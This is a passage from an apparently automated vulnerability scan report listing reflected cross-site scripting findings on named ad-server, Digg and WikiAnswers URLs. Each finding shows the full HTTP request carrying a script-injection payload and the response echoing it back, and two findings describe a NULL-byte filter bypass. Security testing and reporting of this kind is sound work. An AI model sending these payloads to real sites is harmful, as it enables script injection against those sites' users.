Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:09 GMT
X-DirectServer: viacom_DS24
Content-Type: text/html
Content-Length: 2306
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
tempStr = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac000000000000000010202';alert(1)//4440355789c/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5292';



...[SNIP]...

3.490. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cac12'%3balert(1)//af0eabc09d9 was submitted in the REST URL parameter 2. This input was echoed as cac12';alert(1)//af0eabc09d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/heightcac12'%3balert(1)//af0eabc09d9=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:09 GMT
X-DirectServer: viacom_DS25
Content-Type: text/html
Content-Length: 2306
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
Str = destStr.substring((destStr.length - 7));
if (tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/heightcac12';alert(1)//af0eabc09d9=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5292';


/* Try
...[SNIP]...

3.491. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://viacom.adbureau.net
Path:   /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 400d4'%3balert(1)//32c671dbab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 400d4';alert(1)//32c671dbab7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1?400d4'%3balert(1)//32c671dbab7=1 HTTP/1.1
Host: viacom.adbureau.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=0004CDECE75F0DAD1C03232061626364

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium)
Date: Tue, 19 Apr 2011 20:02:09 GMT
X-DirectServer: viacom_DS15
Content-Type: text/html
Content-Length: 2309
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

<body>
<!--Begin JSERVER Skip-->
<script type="text/javascript">

var payload5292,
tempStr,
tempInt,
aamWidth,
aamHeight,
atlasUr
...[SNIP]...
(tempStr.search(/\?click\=/i) > -1)
destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1?400d4';alert(1)//32c671dbab7=1&relocate=';

} else /* Use the Payload if it has content */
destStr = 'javascript:parent.payload5292';


/* Try to get the width and height from AAMLib first */
/
...[SNIP]...

3.492. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 42d87<script>alert(1)</script>f6b106d7236 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/examples/html/xss-wwwviglinkcom-cross-site-scripting.html42d87<script>alert(1)</script>f6b106d7236 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Mon, 18 Apr 2011 23:57:24 GMT
Via: NS-CACHE: 100
Etag: "a7c33c46a8e872caaf6e3118f6a7b12aa7665a38"
Content-Length: 157
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Tue, 19 Apr 2011 00:07:23 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/examples/html/xss-wwwviglinkcom-cross-site-scripting.html42d87<script>alert(1)</script>f6b106d7236", "diggs": 0});

3.493. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984b4"><script>alert(1)</script>3af2ec5fc61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q984b4"><script>alert(1)</script>3af2ec5fc61/FAQ/1873/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:06 GMT
X-Varnish: 519896922
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 77504


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<base href="http://wiki.answers.com/Q984b4"><script>alert(1)</script>3af2ec5fc61/FAQ/1873/x26amp" target="_top">
...[SNIP]...

3.494. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001570f"><script>alert(1)</script>7aada9114c7 was submitted in the REST URL parameter 2. This input was echoed as 1570f"><script>alert(1)</script>7aada9114c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /Q/FAQ%001570f"><script>alert(1)</script>7aada9114c7/1873/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:16 GMT
X-Varnish: 519898453
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 41577

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ%001570f"><script>alert(1)</script>7aada9114c7/1873/x26amp" />
...[SNIP]...

3.495. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76672"><script>alert(1)</script>960fa931a3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/187376672"><script>alert(1)</script>960fa931a3c/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:33 GMT
X-Varnish: 519900860
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 52187


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/187376672"><script>alert(1)</script>960fa931a3c/x26amp" />
...[SNIP]...

3.496. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4116f"%3balert(1)//fe68ef9022c was submitted in the REST URL parameter 3. This input was echoed as 4116f";alert(1)//fe68ef9022c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Q/FAQ/18734116f"%3balert(1)//fe68ef9022c/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:34 GMT
X-Varnish: 519900917
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 52028


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
numAdsFromAdmeld =0;
jQuery(window).load(function (){
       showAdmeldAd("dart_160x600","wikianswers","160x600","atf","_18734116f";alert(1)//fe68ef9022c/x26amp",admeld_site);numAdsFromAdmeld++;    
    if(numAdsFromAdmeld>
...[SNIP]...

3.497. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 653cf"%3balert(1)//03b50bd9b91 was submitted in the REST URL parameter 4. This input was echoed as 653cf";alert(1)//03b50bd9b91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Q/FAQ/1873/x26amp653cf"%3balert(1)//03b50bd9b91 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:38 GMT
X-Varnish: 519901994
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 161671


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
numAdsFromAdmeld =0;
jQuery(window).load(function (){
       showAdmeldAd("dart_160x600","ent/music","160x600","atf","_1873/x26amp653cf";alert(1)//03b50bd9b91",admeld_site);numAdsFromAdmeld++;    
    if(numAdsFromAdmeld>
...[SNIP]...

3.498. http://wiki.answers.com/Q/FAQ/1873/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcea3"><script>alert(1)</script>db96d2302f0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/1873/x26ampfcea3"><script>alert(1)</script>db96d2302f0 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:37 GMT
X-Varnish: 1622868671
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 161813


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/1873/x26ampfcea3"><script>alert(1)</script>db96d2302f0" />
...[SNIP]...

3.499. http://wiki.answers.com/Q/FAQ/1873/x26amp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/1873/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17fcb"><script>alert(1)</script>92195d490b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/1873/x26amp?17fcb"><script>alert(1)</script>92195d490b4=1 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=hd0boian9748faghsegsfo8ef3; path=/; domain=.answers.com
Set-Cookie: hd0boian9748faghsegsfo8ef3=n%3A0%3A%7B%7D; path=/; domain=.answers.com
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:27:53 GMT
X-Varnish: 519894805
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 161527


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<base href="http://wiki.answers.com/Q/FAQ/1873/x26amp?17fcb"><script>alert(1)</script>92195d490b4=1" target="_top">
...[SNIP]...

3.500. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dfa3"><script>alert(1)</script>e28327de2d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q9dfa3"><script>alert(1)</script>e28327de2d6/FAQ/2637/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:04 GMT
X-Varnish: 519896591
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 77437


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<base href="http://wiki.answers.com/Q9dfa3"><script>alert(1)</script>e28327de2d6/FAQ/2637/x26amp" target="_top">
...[SNIP]...

3.501. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0066e4d"><script>alert(1)</script>cdb01e18013 was submitted in the REST URL parameter 2. This input was echoed as 66e4d"><script>alert(1)</script>cdb01e18013 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /Q/FAQ%0066e4d"><script>alert(1)</script>cdb01e18013/2637/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:14 GMT
X-Varnish: 1622865284
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 41578

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ%0066e4d"><script>alert(1)</script>cdb01e18013/2637/x26amp" />
...[SNIP]...

3.502. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae049"><script>alert(1)</script>ee6b216fa7b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/2637ae049"><script>alert(1)</script>ee6b216fa7b/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:31 GMT
X-Varnish: 1622867720
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 151300


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/2637ae049"><script>alert(1)</script>ee6b216fa7b/x26amp" />
...[SNIP]...

3.503. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2586e"%3balert(1)//1842f1efae8 was submitted in the REST URL parameter 3. This input was echoed as 2586e";alert(1)//1842f1efae8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Q/FAQ/26372586e"%3balert(1)//1842f1efae8/x26amp HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:32 GMT
X-Varnish: 519900736
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 52028


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
numAdsFromAdmeld =0;
jQuery(window).load(function (){
       showAdmeldAd("dart_160x600","wikianswers","160x600","atf","_26372586e";alert(1)//1842f1efae8/x26amp",admeld_site);numAdsFromAdmeld++;    
    if(numAdsFromAdmeld>
...[SNIP]...

3.504. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22050"%3balert(1)//7394ecf9e68 was submitted in the REST URL parameter 4. This input was echoed as 22050";alert(1)//7394ecf9e68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Q/FAQ/2637/x26amp22050"%3balert(1)//7394ecf9e68 HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:36 GMT
X-Varnish: 1622868509
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 151159


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
numAdsFromAdmeld =0;
jQuery(window).load(function (){
       showAdmeldAd("dart_160x600","ent/music","160x600","atf","_2637/x26amp22050";alert(1)//7394ecf9e68",admeld_site);numAdsFromAdmeld++;    
    if(numAdsFromAdmeld>
...[SNIP]...

3.505. http://wiki.answers.com/Q/FAQ/2637/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /Q/FAQ/2637/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb30d"><script>alert(1)</script>8795961619a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Q/FAQ/2637/x26ampfb30d"><script>alert(1)</script>8795961619a HTTP/1.1
Host: wiki.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-language: en
Content-Type: text/html; charset=utf-8
Date: Sat, 26 Feb 2011 02:28:35 GMT
X-Varnish: 1622868195
Age: 0
Via: 1.1 varnish
Connection: close
Expires: Tue, 16 Jan 2001 00:00:00 GMT
Cache-Control: private, must-revalidate, s-maxage=0, max-age=0
Vary: Accept-Encoding
Content-Length: 151300


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<link rel="canonical" href="http://wiki.answers.com/Q/FAQ/2637/x26ampfb30d"><script>alert(1)</script>8795961619a" />
...[SNIP]...

